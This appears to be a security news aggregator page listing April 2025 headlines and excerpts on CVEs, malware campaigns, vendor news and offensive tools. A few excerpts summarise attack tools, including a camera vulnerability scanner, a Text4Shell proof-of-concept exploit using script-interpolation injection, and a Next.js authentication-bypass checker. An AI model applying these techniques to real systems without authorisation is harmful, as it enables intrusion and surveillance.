Camtruder - Advanced RTSP Camera Discovery and Vulnerability Assessment Tool
Camtruder is a high-performance RTSP camera discovery and vulnerability assessment tool written in Go. It efficiently scans and identifies vulnerable RTSP cameras across networks using various authentication methods and path combinations, with support for both targeted and internet-wide scanning capabilities. 🌟 Key Features Advanced Scanning Capabilities Single IP targeting CIDR range scanning File-based target lists Pipe input support Internet-wide scanning with customizable limits Intelligent port discovery Location-based search using RIPE database Raw CIDR output for integration with other tools Screenshot Capability Capture screenshots of discovered cameras Automatic saving of JPEG images Requires ffmpeg installation Configurable output directory Location-Based Search Search...
http://www.kitploit.com/2025/04/camtruder-advanced-rtsp-camera.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
SAP NetWeaver Flaw Scores 10.0 Severity as Hackers Deploy Web Shells
A critical vulnerability (CVE-2025-31324) in SAP NetWeaver Visual Composer puts systems at risk of full compromise. Learn how…
https://hackread.com/sap-netweaver-flaw-severity-hackers-deploy-web-shells/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
How SBOMs power secure software acquisition | Sonatype Blog
CISA's Supply Chain Integrity Month reminds us of an undeniable truth about modern software development: transparency in software supply chains is no longer optional. The theme of week 4 is "Transparency: Securing Hardware and Software Across the Supply Chain." With more than 90% of modern software applications relying on open source, this message couldn't be more timely. Transparency is at the heart of the current trend in legislative action, which puts a spotlight on the way agencies evaluate, purchase, and monitor software.
https://www.sonatype.com/blog/how-sboms-power-secure-software-acquisition
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Critical Commvault Flaw Allows Full System Takeover – Update NOW
Enterprises using Commvault Innovation Release are urged to patch immediately against CVE-2025-34028. This critical flaw allows attackers to…
https://hackread.com/critical-commvault-flaw-allows-full-system-takeover/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Metasploit Wrap-Up 04/25/2025
AD CS workflow improvement with new PKCS12 features
Given the increasing popularity of AD CS misconfiguration exploitation in recent years, Metasploit has been consistently improving its capabilities in this area. This week's release introduces a new certs command to the msfconsole, enabling users to manage PKCS12 certificates stored in
https://blog.rapid7.com/2025/04/25/metasploit-wrap-up-04-25-2025/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Why We're Launching a Trusted AI Safety Knowledge Certification Program
Written by Anna Campbell Schorr, Training Program Director, Cloud Security Alliance.
Over the years, we've witnessed security paradigms evolve—from the early days of perimeter defense, to the rise of Zero Trust, and most recently, the challenges introduced by Artificial Intelligence (AI). AI is rapidly becoming a cornerstone of the enterprise landscape: according to The State of AI and Security Survey Report by the Cloud Security Alliance (CSA), 69% of organizations are alre...
https://cloudsecurityalliance.org/articles/why-we-re-launching-a-trusted-ai-safety-knowledge-certification-program
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Mobile Applications: A Cesspool of Security Issues
An analysis of more than a half-million mobile apps find encryption problems, privacy issues, and known vulnerabilities in third-party code. What can users and developers do?
https://www.darkreading.com/remote-workforce/mobile-applications-cesspool-security-issues
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Check Point and Illumio Team Up to Advance Zero Trust with Unified Security and Threat Prevention
Check Point Software Technologies and Illumio have announced a strategic partnership aimed at helping organisations enhance their Zero Trust strategies and proactively contain cyber threats. The integration brings together Check Point's Infinity Platform, which includes Quantum Force firewalls, Infinity ThreatCloud AI, and AI-powered Security Management, with Illumio's Segmentation and Insights capabilities. The result is a […]
The post Check Point and Illumio Team Up to Advance Zero Trust with Unified Security and Threat Prevention appeared first on IT Security Guru.
https://www.itsecurityguru.org/2025/04/25/check-point-and-illumio-team-up-to-advance-zero-trust-with-unified-security-and-threat-prevention/?utm_source=rss&utm_medium=rss&utm_campaign=check-point-and-illumio-team-up-to-advance-zero-trust-with-unified-security-and-threat-prevention
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
AI is getting “creepy good” at geo-guessing
After hearing about ChatGPT o3 ability at geo-guessing we decided to run some tests and the tested AIs didn't fail to amaze us
https://www.malwarebytes.com/blog/news/2025/04/ai-is-getting-creepy-good-at-geo-guessing
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Advanced Cryptography: new approaches to data privacy
A new NCSC paper discusses the suitability of emerging Advanced Cryptography techniques.
https://www.ncsc.gov.uk/blog-post/advanced-cryptography-new-approaches-to-data-privacy
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Drained Wallets: How to Protect Your Assets From Advanced Phishing Scams
With the rapid expansion of technological advancements, there have been many great innovations across various industries that have had a positive impact on the world. However, these advancements also mean the latest technologies may not always be used for legal or ethical activities, making being online a very risky business these days. Phishing is a […]
The post Drained Wallets: How to Protect Your Assets From Advanced Phishing Scams appeared first on IT Security Guru.
https://www.itsecurityguru.org/2025/04/25/drained-wallets-how-to-protect-your-assets-from-advanced-phishing-scams/?utm_source=rss&utm_medium=rss&utm_campaign=drained-wallets-how-to-protect-your-assets-from-advanced-phishing-scams
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Deep Dive Into Major Dating App Breach That Exposed Private Images
This week in cybersecurity from the editors at Cybercrime Magazine –Listen to the Podcast Sausalito, Calif. – Apr. 25, 2025 TechRadar Pro recently reported that five dating apps exposed over 1.5 million private and explicit images after storing the images in cloud storage buckets without any password
The post Deep Dive Into Major Dating App Breach That Exposed Private Images appeared first on Cybercrime Magazine.
https://cybersecurityventures.com/deep-dive-into-major-dating-app-breach-that-exposed-private-images/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Frogy2.0 - An Automated External Reconnaissance And Attack Surface Management (ASM) Toolkit
Frogy 2.0 is an automated external reconnaissance and Attack Surface Management (ASM) toolkit designed to map out an organization's entire internet presence. It identifies assets, IP addresses, web applications, and other metadata across the public internet and then smartly prioritizes them with highest (most attractive) to lowest (least attractive) from an attacker's playground perspective. Features Comprehensive recon: Aggregate subdomains and assets using multiple tools (CHAOS, Subfinder, Assetfinder, crt.sh) to map an organization's entire digital footprint. Live asset verification: Validate assets with live DNS resolution and port scanning (using DNSX and Naabu) to confirm what is publicly reachable. In-depth web recon: Collect detailed HTTP response data (via HTTPX) including...
http://www.kitploit.com/2025/04/frogy20-automated-external.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Build smarter with AI and your software supply chain
AI adoption is reshaping how software gets built. From coding assistants to full-fledged agentic AI applications, developers now routinely rely on artificial intelligence in their workflows. But a subtler shift is also underway: the rise of open source AI/ML models as foundational components in modern software development.
https://www.sonatype.com/blog/build-smarter-with-ai-and-your-software-supply-chain
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Making Security Invisible and Effective
Despite DevSecOps being a well-understood priority, many teams still find themselves getting security alerts too late. Developers often feel burdened rather than empowered, and security vulnerabilities may make their way into the final stages before a release. Traditional AppSec tools, while powerful, can create miscommunication between teams, forcing developers to step outside of their familiar […]
The post Making Security Invisible and Effective appeared first on IT Security Guru.
https://www.itsecurityguru.org/2025/04/25/making-security-invisible-effective/?utm_source=rss&utm_medium=rss&utm_campaign=making-security-invisible-effective
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Triada strikes back
Kaspersky expert has discovered a new version of the Triada Trojan, with custom modules for Telegram, WhatsApp, TikTok, and other apps.
https://securelist.com/triada-trojan-modules-analysis/116380/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Deepfake 'doctors' take to TikTok to peddle bogus cures
Look out for AI-generated 'TikDocs' who exploit the public's trust in the medical profession to drive sales of sketchy supplements
https://www.welivesecurity.com/en/social-media/deepfake-doctors-tiktok-bogus-cures/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Commvault Command Center Path Traversal Vulnerability (CVE-2025-34028)
What is the Vulnerability?A critical path traversal vulnerability has been identified in Commvault's Command Center Innovation Release. The vulnerability, tracked as CVE-2025-34028, has been assigned a CVSS score of 9.0. This flaw allows unauthenticated remote attackers to upload specially crafted ZIP files. When these files are expanded by the server, they can lead to arbitrary code execution, potentially resulting in a complete system compromise. Commvault serves a diverse range of industries, including Healthcare, Financial Services, Manufacturing, and more. for securing data management and compliance, protecting financial data and efficiently backing up data.What is the recommended Mitigation?Commvault has addressed this vulnerability in the following patched versions: 11.38 and 11.38.25....
https://fortiguard.fortinet.com/threat-signal-report/6081
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Erlang/OTP RCE (CVE-2025-32433)
What is the Vulnerability?A critical SSH vulnerability has recently been identified in the Erlang/Open Telecom Platform (OTP). The vulnerability, tracked as CVE-2025-32433, has been assigned a CVSS score of 10.0. It is unauthenticated, remotely exploitable, and requires low complexity to execute.Erlang/OTP is commonly found in IoT devices and telecommunications platforms, and is prominently used by companies such as Ericsson, WhatsApp, and Cisco, among others.What is the recommended Mitigation?A security patch for OTP has been made available via GitHub. FortiGuard Labs strongly recommends that organizations prioritize applying the latest security updates.What FortiGuard Coverage is available?• FortiGuard Labs has available IPS protection for CVE-2025-32433 which detects and block attack...
https://fortiguard.fortinet.com/threat-signal-report/6077
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Cloud Security Alliance Honors CrowdStrike Founder and CEO George Kurtz with 2025 Philippe Courtot Leadership Award
Kurtz recognized for outstanding efforts in advancing cloud security, cybersecurity worldwide
SAN FRANCISCO (RSA Conference) and SEATTLE – April 28, 2025 – The Cloud Security Alliance (CSA), the world's leading organization dedicated to defining and raising awareness of best practices to help ensure a secure cloud computing environment, is thrilled to announce George Kurtz, founder and CEO of CrowdStrike, as the recipient of the Philippe Courtot Leadership Award for 2025. CSA's ann...
https://cloudsecurityalliance.org/articles/csa-honors-crowdstrike-founder-and-ceo-george-kurtz-with-2025-philippe-courtot-leadership-award
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Understanding SAQ A and SAQ A-EP Eligibility: A Streamlined Approach to PCI DSS Compliance
Originally published by BARR Advisory.
For businesses that accept online payments, compliance with the Payment Card Industry Data Security Standard (PCI DSS) is essential, but it doesn't have to be overwhelming.
If your business does not store, process, or transmit cardholder data (CHD) and relies on a third-party service provider (TPSP) for payment processing, you may qualify for a Self-Assessment Questionnaire (SAQ) A or SAQ A-EP—a streamlined approach to PCI D...
https://cloudsecurityalliance.org/articles/understanding-saq-a-and-saq-a-ep-eligibility-a-streamlined-approach-to-pci-dss-compliance
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
RSAC 2025 Preview: What's The Buzz To Know Before the Show?
https://www.proofpoint.com/us/newsroom/news/rsac-2025-preview-whats-buzz-know-show
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Zoom attack tricks victims into allowing remote access to install malware and steal money
Attackers are luring victims into a Zoom call and then taking over their PC to install malware, infiltrate their accounts, and steal their assets.
https://www.malwarebytes.com/blog/news/2025/04/zoom-attack-tricks-victims-into-allowing-remote-access-to-install-malware-and-steal-money
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
XLoader Info-stealer Distributed Using MS Equation Editor Vulnerability (CVE-2017-11882)
AhnLab Security Intelligence Center (ASEC) publishes the information of phishing emails to AhnLab TIP monthly under the title “Trends Report on Phishing Emails.” There are various keywords/topics disguised as phishing, and this blog will cover cases where emails disguised as emails for checking purchases and order confirmations are used to distribute the XLoader info-stealer. The […]
https://asec.ahnlab.com/en/87724/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
THE NEW Rapid7 MDR for Enterprise: Tailored Detection and Response for Complex Environments
We're excited to introduce Rapid7 MDR for Enterprise—a fully managed, customized detection and response service designed to meet the complexity of the modern enterprise head-on.
https://blog.rapid7.com/2025/04/24/the-new-rapid7-mdr-for-enterprise-tailored-detection-and-response-for-complex-environments/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Android malware turns phones into malicious tap-to-pay machines
A newly discovered malicious program effectively turns Android phones into malicious tap machines that vacuum up payment card data.
https://www.malwarebytes.com/blog/news/2025/04/android-malware-turns-phones-into-malicious-tap-to-pay-machines
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
4.7 million customers’ data accidentally leaked to Google by Blue Shield of California
Blue Shield of California said it accidentally leaked the personal data of 4.7 million individuals to Google after a Google Analytics misconfiguration.
https://www.malwarebytes.com/blog/news/2025/04/4-7-million-customers-data-accidentally-leaked-to-google-by-blue-shield-of-california
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Cybercrime Magazine's First YouTube Video: A 60-Second Walk In The Park
This week in cybersecurity from the editors at Cybercrime Magazine –Watch the YouTube Video Sausalito, Calif. – Apr. 24, 2025 YouTube turned 20 years old yesterday. The Verge reports that the platform's first video, “Me at the Zoo,” was uploaded to YouTube on Apr. 23, 2005. It's
The post Cybercrime Magazine’s First YouTube Video: A 60-Second Walk In The Park appeared first on Cybercrime Magazine.
https://cybersecurityventures.com/cybercrime-magazines-first-youtube-video-a-60-second-walk-in-the-park/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
PEGASUS-NEO - A Comprehensive Penetration Testing Framework Designed For Security Professionals And Ethical Hackers. It Combines Multiple Security Tools And Custom Modules For Reconnaissance, Exploitation, Wireless Attacks, Web Hacking, And More
____ _ _ | _ \ ___ __ _ __ _ ___ _ _ ___| \ | | | |_) / _ \/ _` |/ _` / __| | | / __| \| | | __/ __/ (_| | (_| \__ \ |_| \__ \ |\ | |_| \___|\__, |\__,_|___/\__,_|___/_| \_| |___/ ███▄ █ ▓█████ ▒█████ ██ ▀█ █ ▓█ ▀ ▒██▒ ██▒ ▓██ ▀█ ██▒▒███ ▒██░ ██▒ ▓██▒ ▐▌██▒▒▓█ ▄ ▒██...
http://www.kitploit.com/2025/04/pegasus-neo-comprehensive-penetration.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Q4 2024 Cyber Attacks Statistics
I aggregated the statistics created from the cyber attacks timelines published in Q4 2024. In this period, I collected a total of 694 events dominated by Cyber Crime with 70%, slightly up from 65.5% of Q3.
https://www.hackmageddon.com/2025/04/24/q4-2024-cyber-attacks-statistics/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Proofpoint Appoints Mark Templeton to its Board of Directors
https://www.proofpoint.com/us/newsroom/press-releases/proofpoint-appoints-mark-templeton-board-of-directors
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
MIWIC25: Helen Oluyemi, Information Security Manager at Pollinate International Limited
Organised by Eskenzi PR in media partnership with the IT Security Guru, the Most Inspiring Women in Cyber Awards aim to shed light on the remarkable women in our industry. The following is a feature on one of 2024's Top 20 women selected by an esteemed panel of judges. Presented in a Q&A format, the nominee's answers are […]
The post MIWIC25: Helen Oluyemi, Information Security Manager at Pollinate International Limited appeared first on IT Security Guru.
https://www.itsecurityguru.org/2025/04/24/miwic25-helen-oluyemi-information-security-manager-at-pollinate-international-limited/?utm_source=rss&utm_medium=rss&utm_campaign=miwic25-helen-oluyemi-information-security-manager-at-pollinate-international-limited
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Operation SyncHole: Lazarus APT goes back to the well
Kaspersky GReAT experts uncovered a new campaign by Lazarus APT that exploits vulnerabilities in South Korean software products and uses a watering hole approach.
https://securelist.com/operation-synchole-watering-hole-attacks-by-lazarus/116326/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Shopify faces privacy lawsuit for collecting customer data
Shopify is facing a class action lawsuit that could change the way globally active companies can be held accountable
https://www.malwarebytes.com/blog/news/2025/04/shopify-faces-privacy-lawsuit-for-collecting-customer-data
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
DOGE Worker's Code Supports NLRB Whistleblower
A whistleblower at the National Labor Relations Board (NLRB) alleged last week that denizens of Elon Musk's Department of Government Efficiency (DOGE) siphoned gigabytes of data from the agency's sensitive case files in early March. The whistleblower said accounts created for DOGE at the NLRB downloaded three code repositories from GitHub. Further investigation into one of those code bundles shows it is remarkably similar to a program published in January 2025 by Marko Elez, a 25-year-old DOGE employee who has worked at a number of Musk's companies.
https://krebsonsecurity.com/2025/04/doge-workers-code-supports-nlrb-whistleblower/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Implementing CCM: Enterprise Risk Management Controls
The Cloud Controls Matrix (CCM) is a framework of controls that are essential for cloud computing security. It is created and updated by CSA and aligned to CSA best practices.
You can use CCM to systematically assess and guide the security of any cloud implementation. CCM also provides guidance on which actors within the cloud supply chain should implement which security controls. Both cloud service customers (CSCs) and cloud service providers (CSPs) use CCM in many ways.
CSCs use CCM ...
https://cloudsecurityalliance.org/articles/implementing-ccm-enterprise-risk-management-controls
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Phishing Tests: What Your Provider Should Be Telling You
Originally published by Schellman.
Written by Austin Bentley.
It's no secret: many organizations view and treat phishing as a periodic checkbox assessment. It's often a basic email template sent to an entire organization. If someone clicks the link, they are recorded and possibly enrolled in training. While this approach can certainly check the “quarterly phishing exercise” box, you should consider demanding even more from your phishing assessment. After all, when you engag...
https://cloudsecurityalliance.org/articles/phishing-tests-what-your-provider-should-be-telling-you
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Proofpoint unveils unified platforms to combat data & cyber risks
https://www.proofpoint.com/us/newsroom/news/proofpoint-unveils-unified-platforms-combat-data-cyber-risks
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
MIWIC25: Jess Matthews, Compliance Governance Officer at Acacium Group
Organised by Eskenzi PR in media partnership with the IT Security Guru, the Most Inspiring Women in Cyber Awards aim to shed light on the remarkable women in our industry. The following is a feature on one of 2024's Top 20 women selected by an esteemed panel of judges. Presented in a Q&A format, the nominee's answers are […]
The post MIWIC25: Jess Matthews, Compliance Governance Officer at Acacium Group appeared first on IT Security Guru.
https://www.itsecurityguru.org/2025/04/23/miwic25-jess-matthews/?utm_source=rss&utm_medium=rss&utm_campaign=miwic25-jess-matthews
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Ransom & Dark Web Issues Week 4, April 2025
ASEC Blog publishes Ransom & Dark Web Issues Week 4, April 2025 A major Dutch food distribution company has been listed as a new victim of INC Ransom ransomware. Ransomware group DevMan claims an attack on a Singapore construction company. The city of Grove in Oklahoma, USA, […]
https://asec.ahnlab.com/en/87627/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
From Noise to Action: Introducing Intelligence Hub
We are delighted to announce the availability of Intelligence Hub, an evolution in threat intelligence delivery that is designed to provide meaningful context and actionable insights integrated with the Rapid7 Command Platform.
https://blog.rapid7.com/2025/04/23/from-noise-to-action-introducing-intelligence-hub/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Security-Focused Brokers Underwrite Better Cyberinsurance Policies
This week in cybersecurity from the editors at Cybercrime Magazine –Read the full story in Insurance Business Magazine Sausalito, Calif. – Apr. 23, 2025 As ransomware, social engineering, and AI-driven deception reshape the threat landscape, cyberinsurance brokers are under pressure to deliver more than just
The post Security-Focused Brokers Underwrite Better Cyberinsurance Policies appeared first on Cybercrime Magazine.
https://cybersecurityventures.com/security-focused-brokers-underwrite-better-cyberinsurance-policies/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Text4Shell-Exploit - A Custom Python-based Proof-Of-Concept (PoC) Exploit Targeting Text4Shell (CVE-2022-42889), A Critical Remote Code Execution Vulnerability In Apache Commons Text Versions < 1.10
A custom Python-based proof-of-concept (PoC) exploit targeting Text4Shell (CVE-2022-42889), a critical remote code execution vulnerability in Apache Commons Text versions < 1.10. This exploit targets vulnerable Java applications that use the StringSubstitutor class with interpolation enabled, allowing injection of ${script:...} expressions to execute arbitrary system commands. In this PoC, exploitation is demonstrated via the data query parameter; however, the vulnerable parameter name may vary depending on the implementation. Users should adapt the payload and request path accordingly based on the target application's logic. Disclaimer: This exploit is provided for educational and authorized penetration testing purposes only. Use responsibly and at your own risk. Description This...
http://www.kitploit.com/2025/04/text4shell-exploit-custom-python-based.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Extortion and Ransomware Trends January-March 2025
Ransomware leak site data and Unit 42 case studies reveal new trends from Q1 2025, including the most active groups, targeted industries and novel extortion tactics.
The post Extortion and Ransomware Trends January-March 2025 appeared first on Unit 42.
https://unit42.paloaltonetworks.com/2025-ransomware-extortion-trends/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
How fraudsters abuse Google Forms to spread scams
The form and quiz-building tool is a popular vector for social engineering and malware. Here's how to stay safe.
https://www.welivesecurity.com/en/scams/how-fraudsters-abuse-google-forms-spread-scams/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
New Cloud Security Alliance Certification Program Equips Professionals With Skills to Ensure Responsible and Safe Development and Management of Artificial Intelligence (AI)
Partnership with Northeastern University to deliver critical education for the future of IT and cybersecurity
SAN FRANCISCO (RSA Conference) and SEATTLE – April 28, 2025 – The Cloud Security Alliance (CSA), the world's leading organization dedicated to defining standards, certifications, and best practices to help ensure a secure cloud computing environment, has partnered with Northeastern University to develop the Trusted AI Safety Knowledge & Certification Program. This program...
https://cloudsecurityalliance.org/articles/csa-certification-program-equips-professionals-with-skills-to-ensure-responsible-and-safe-development-and-management-of-artificial-intelligence-ai
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
A New Era for Compliance: Introducing the Compliance Automation Revolution (CAR)
Written by Daniele Catteddu, CTO, Cloud Security Alliance (CSA).
Introducing the Compliance Automation Revolution (CAR) Initiative
In today's rapidly evolving digital landscape, it is of strategic importance that technology providers are not only secure but can, at any time, demonstrate in a consistent manner ongoing protection of data whenever required. In other terms this means that compliance and assurance are paramount. Organizations operate in an environment shaped by eve...
https://cloudsecurityalliance.org/articles/a-new-era-for-compliance-introducing-the-compliance-automation-revolution-car
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Elevate your organization's success: Submissions now open for the 2025 Sonatype Elevate Awards
We are thrilled to announce that the 2025 Sonatype Elevate Awards are officially open for submissions.
https://www.sonatype.com/blog/elevate-your-organizations-success-submissions-now-open-for-the-2025-sonatype-elevate-awards
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Proofpoint Unveils Industry's First and Only Unified Solution to Reduce Costs and Cyber Risk Across the Expanding Workspace
https://www.proofpoint.com/us/newsroom/press-releases/proofpoint-unveils-industrys-first-and-only-unified-solution-reduce-costs
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Proofpoint Debuts Unified Data Security Protection Across Data Exfiltration, Exposure and Insider Threats
https://www.proofpoint.com/us/newsroom/press-releases/proofpoint-debuts-unified-data-security-protection-across-data-exfiltration
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
December 2024 Cyber Attacks Statistics
After the cyber attacks timelines, it's time to publish the statistics for December 2024 where I collected and analyzed 209 events primarily driven by Cyber Crime.
https://www.hackmageddon.com/2025/04/22/december-2024-cyber-attacks-statistics/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
All Gmail users at risk from clever replay attack
All Google accounts could end up compromised by a clever replay attack on Gmail users that abuses Google infrastructure.
https://www.malwarebytes.com/blog/news/2025/04/all-gmail-users-at-risk-by-clever-replay-attack
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Russian organizations targeted by backdoor masquerading as secure networking software updates
While investigating an incident, we discovered a sophisticated new backdoor targeting Russian organizations by impersonating secure networking software updates.
https://securelist.com/new-backdoor-mimics-security-software-update/116246/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Ransomware Damage To Cost The World B In 2025
This week in cybersecurity from the editors at Cybercrime Magazine –Read the full story in Cybercrime Magazine Sausalito, Calif. – Apr. 22, 2025 Cybersecurity Ventures publishes a chart at RansomwareCost.com containing our calculations of global ransomware damage cost predictions from 2015 to 2031. For this year, 2025,
The post Ransomware Damage To Cost The World B In 2025 appeared first on Cybercrime Magazine.
https://cybersecurityventures.com/ransomware-damage-to-cost-the-world-57b-in-2025/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Ghost-Route - Ghost Route Detects If A Next JS Site Is Vulnerable To The Corrupt Middleware Bypass Bug (CVE-2025-29927)
A Python script to check Next.js sites for corrupt middleware vulnerability (CVE-2025-29927). The corrupt middleware vulnerability allows an attacker to bypass authentication and access protected routes by send a custom header x-middleware-subrequest. Next JS versions affected: - 11.1.4 and up [!WARNING] This tool is for educational purposes only. Do not use it on websites or systems you do not own or have explicit permission to test. Unauthorized testing may be illegal and unethical. Installation Clone the repo git clone https://github.com/takumade/ghost-route.gitcd ghost-route Create and activate virtual environment python -m venv .venvsource .venv/bin/activate Install dependencies pip install -r requirements.txt Usage python ghost-route.py <url> <path> <show_headers>...
http://www.kitploit.com/2025/04/ghost-route-ghost-route-detects-if-next.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Will super-smart AI be attacking us anytime soon?
What practical AI attacks exist today? “More than zero” is the answer – and they're getting better.
https://www.welivesecurity.com/en/cybersecurity/super-smart-ai-attacking/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
The Role of SSL Certificates in Website Security and Performance
Secure Sockets Layer (SSL) certificates are important for website security. Almost every list of website…
The Role of SSL Certificates in Website Security and Performance on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
https://latesthackingnews.com/2025/04/22/the-role-of-ssl-certificates-in-website-security-and-performance/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Implementing CCM: Data Protection and Privacy Controls
The Cloud Controls Matrix (CCM) is a framework of essential cloud security controls that follow CSA best practices. You can use CCM to assess and guide the security of any cloud implementation. CCM also provides guidance on which actors within the cloud supply chain should implement which security controls. Both cloud service customers (CSCs) and cloud service providers (CSPs) use CCM in many ways.
CCM contains 197 control objectives structured into 17 domains that cover all key aspe...
https://cloudsecurityalliance.org/articles/implementing-ccm-data-protection-and-privacy-controls
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
CrushFTP Authentication Bypass
What is the Vulnerability?FortiGuard Labs has observed in-the-wild attack attempts targeting CVE-2025-31161, an authentication bypass vulnerability in CrushFTP managed file transfer (MFT) software. Successful exploitation may grant attackers administrative access to the application, posing a serious threat to enterprise environments.The vulnerability is remotely exploitable, and a proof-of-concept (PoC) exploit is now publicly available. This increases the risk of rapid adoption by threat actors, including ransomware groups who have historically targeted MFT platforms like MOVEit Transfer and Cleo MFT.According to the Shadowserver Foundation, approximately 1,800 unpatched, internet-exposed CrushFTP instances remain vulnerable globally, heightening the urgency for immediate mitigation.What...
https://fortiguard.fortinet.com/threat-signal-report/6072
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Whistleblower: DOGE Siphoned NLRB Case Data
A security architect with the National Labor Relations Board (NLRB) alleges that employees from Elon Musk's Department of Government Efficiency (DOGE) transferred gigabytes of sensitive data from agency case files in early March, using short-lived accounts configured to leave few traces of network activity. The NLRB whistleblower said the unusual large data outflows coincided with multiple blocked login attempts from an Internet address in Russia that tried to use valid credentials for a newly-created DOGE user account.
https://krebsonsecurity.com/2025/04/whistleblower-doge-siphoned-nlrb-case-data/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Forging Robust Cloud Defenses for Modern Businesses
Originally published by Reemo.
Written by Florent Paret.
The wholesale adoption of cloud technology has become a cornerstone of digital transformation, empowering enterprises with unprecedented agility and scalability within today's fiercely competitive landscape. Yet, this evolution introduces a labyrinth of security challenges demanding immediate and decisive action. Cloud-based services now constitute the lifeblood of business operations, underscoring the critical neces...
https://cloudsecurityalliance.org/articles/forging-robust-cloud-defenses-for-modern-businesses
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
CVE-2025-3857 - Infinite loop condition in Amazon.IonDotnet
Publication Date: 2025/04/21 08:00 AM PDT
Description
Amazon.IonDotnet (ion-dotnet) is a .NET library with an implementation of the Ion data serialization format.
We identified CVE-2025-3857, an infinite loop condition in Amazon.IonDotnet. When reading binary Ion data through this library using the RawBinaryReader class, Amazon.IonDotnet does not check the number of bytes read from the underlying stream while deserializing the binary format. If the Ion data is malformed or truncated, this triggers an infinite loop condition that could potentially result in a denial of service.
We released a fix in version 1.3.1 and recommend users upgrade to address this issue. Additionally, ensure any forked or derivative code is patched to incorporate the new fixes.
Affected version: ...
https://aws.amazon.com/security/security-bulletins/AWS-2025-009/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Malicious LNK Disguised as Notices
AhnLab SEcurity intelligence Center (ASEC) recently discovered a malicious LNK file being distributed to Korean users for the purpose of stealing user information. This type of malware collects various valuable data for threat actors, such as data related to virtual assets, browsers, public certificates, and email files, and it also performs keylogging. The confirmed malicious […]
https://asec.ahnlab.com/en/87620/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Distribution of PebbleDash Malware in March 2025
PebbleDash is a backdoor malware that was previously identified by the Cybersecurity and Infrastructure Security Agency (CISA) in the U.S. as a backdoor malware of Lazarus (Hidden Corba) in 2020. At the time, it was known as the malware of the Lazarus group, but recently, there have been more cases of the PebbleDash malware being […]
https://asec.ahnlab.com/en/87621/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Shadow downloads – How developers have become the new perimeter
With great power comes great responsibility.
https://www.sonatype.com/blog/shadow-downloads-how-developers-have-become-the-new-perimeter
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Cybersecurity VC deal flow and M&A activity heat up in early 2025
This week in cybersecurity from the editors at Cybercrime Magazine –Listen to the Podcast Sausalito, Calif. – Apr. 21, 2025 Crunchbase reports that overall, the first quarter of 2025 marked the strongest one for venture investment since Q2 2022, and it was also the strongest quarter for
The post Cybersecurity VC deal flow and M&A activity heat up in early 2025 appeared first on Cybercrime Magazine.
https://cybersecurityventures.com/cybersecurity-vc-deal-flow-and-ma-activity-heat-up-in-early-2025/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Top Lessons from Take Command 2025
Take Command 2025 delivered big insights on AI, exposure management, red teaming, and cloud defense. Catch up with on-demand sessions.
https://blog.rapid7.com/2025/04/21/top-lessons-from-take-command-2025/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Bytesrevealer - Online Reverse Enginerring Viewer
